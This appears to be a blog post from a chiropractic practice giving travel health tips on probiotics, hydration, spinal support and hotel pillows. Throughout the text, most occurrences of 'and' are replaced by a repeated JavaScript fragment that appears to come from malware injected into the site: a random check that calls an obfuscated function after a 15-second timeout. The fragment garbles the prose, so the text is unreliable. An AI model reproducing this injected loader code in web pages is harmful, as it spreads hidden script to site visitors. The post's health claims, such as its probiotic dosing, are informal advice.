There are so many things to think about before andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and during your trip. Most people are not focused on how to keep themselves healthy throughout the process. This is why many people come home from their travels depleted, immune system depressed, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and feeling run down.

If you prepare, there are some really easy steps you can take to make sure that your health doesn’t suffer while you are away.

Take a Probiotic

No doubt while you are on your vacation you will be eating different foods than you normally eat at home. You also will be eating out most the time. One of the greatest ways you can protect your digestive system from being damaged is to take a probiotic  before andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and during your trip. I usually start one week before my trip. A probiotic is a part of my daily health regime, but before I travel I take a higher dosed one. You most likely will want to take 20 billion CFU’s or greater.

What a high quality probiotic will do is put good bacteria in your small intestine. 70-80% of your immune system comes from your gut. The more good bacteria you have in your gut, the stronger your immunity will be. Eating strange foods, dealing with time changes, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and traveling in airplanes with recirculated air all can impact your immune system negatively.

Hydrate

Traveling dehydrates you. Especially if you are traveling by airplane. When you are dehydrated the mucous membranes in your nose andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and throat dry out andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and become more susceptible to infection. An easy way to avoid this is to drink more water than you normally do. I usually start increasing my water intake a week before I travel, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and while I am on my trip I will keep focused on drinking water all the time. It’s easy, free, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and one of the most effective steps you can take to keep yourself healthy.

Think about your spinal curves

The physical demandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ands of traveling can be hard on your spine andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and muscles. Carrying heavy luggage, sleeping in different beds, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and long flights can all place a tremendous amount of stress on your body. There are a few key things you can do to minimize the damage.

Whenever I fly, I bring a larger bag or backpack with me to slide under my seat during the flight. I often will use this bag as a foot stool that elevates my knees andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and take stress off my lower back. I also travel with small rolls (like the ones we put in your homecare kit) to sleep on. These rolls help reset the curves in your spine andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and make sure that ligaments andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and muscles don’t spasm.

Many hotels have big fluffy pillows that will damage your neck curves. Ask the hotel front desk for a smaller flat pillow or take some towels from the bathroom andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and put them in an empty pillow case to create a flat, more moldable pillow.
